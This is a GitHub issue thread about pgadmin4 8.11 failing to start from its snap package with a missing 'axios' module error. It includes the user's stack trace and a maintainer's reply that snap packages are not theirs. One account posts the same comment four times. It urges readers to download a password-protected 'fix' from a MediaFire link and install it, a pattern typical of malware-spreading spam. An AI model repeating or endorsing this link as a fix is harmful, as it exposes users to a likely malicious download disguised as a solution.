### ISSUE TITLE
Snap startup error: Cannot find package 'axios'

### ISSUE THREAD

**Issue by CodeShakingSheep** [pgadmin-org/pgadmin4#7855]
**Describe the bug**

I have pgadmin4 installed via snap.  I can see that pgadmin4 was updated from version 8.10 to version 8.11 14 hours ago. Since then pgadmin4 doesn't start anymore. Before it was working fine. The error message is `Cannot find package 'axios'`. Further details see screenshot.

**To Reproduce**

1. Install version 8.10 of pgadmin4 via snap
2. Update pgadmin4 to version 8.11 via snap

**Expected behavior**

pgadmin4 should start successfully.

**Error message**

```
A JavaScript error occurred in the main process
Uncaught Exception:
Error [ERR_MODULE_NOT_FOUND]: Cannot find package 'axios' imported from /snap/pgadmin4/8/usr/pgadmin4/bin/resources/app/src/js/pgadmin.js
    at packageResolve (node:internal/modules/esm/resolve:861:9)
    at moduleResolve (node:internal/modules/esm/resolve:934:18)
    at defaultResolve (node:internal/modules/esm/resolve:1176:11)
    at ModuleLoader.defaultResolve (node:internal/modules/esm/loader:383:12)
    at ModuleLoader.resolve (node:internal/modules/esm/loader:352:25)
    at ModuleLoader.getModuleJob (node:internal/modules/esm/loader:227:38)
    at ModuleWrap.<anonymous> (node:internal/modules/esm/module_job:87:39)
    at link (node:internal/modules/esm/module_job:86:36)
Gtk-Message: 22:02:45.961: Not loading module "atk-bridge": The functionality is provided by GTK natively. Please try to not load it.
libpxbackend-1.0.so: cannot open shared object file: No such file or directory
Failed to load module: /home/uh/snap/pgadmin4/common/.cache/gio-modules/libgiolibproxy.so
```

**Screenshots**

![image](https://github.com/user-attachments/assets/cd2e0cf6-bcc1-47d4-8862-c44dfd67ecff)

**Desktop (please complete the following information):**
 - OS: Ubuntu
 - Version: 22.04
 - Mode: Desktop
 - Package type: Snap

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adityatoshniwal** [comment]
pgAdmin team do not maintain snap packages. Please raise the issue to the maintainer.
We're not able to reproduce the issue with our installers.
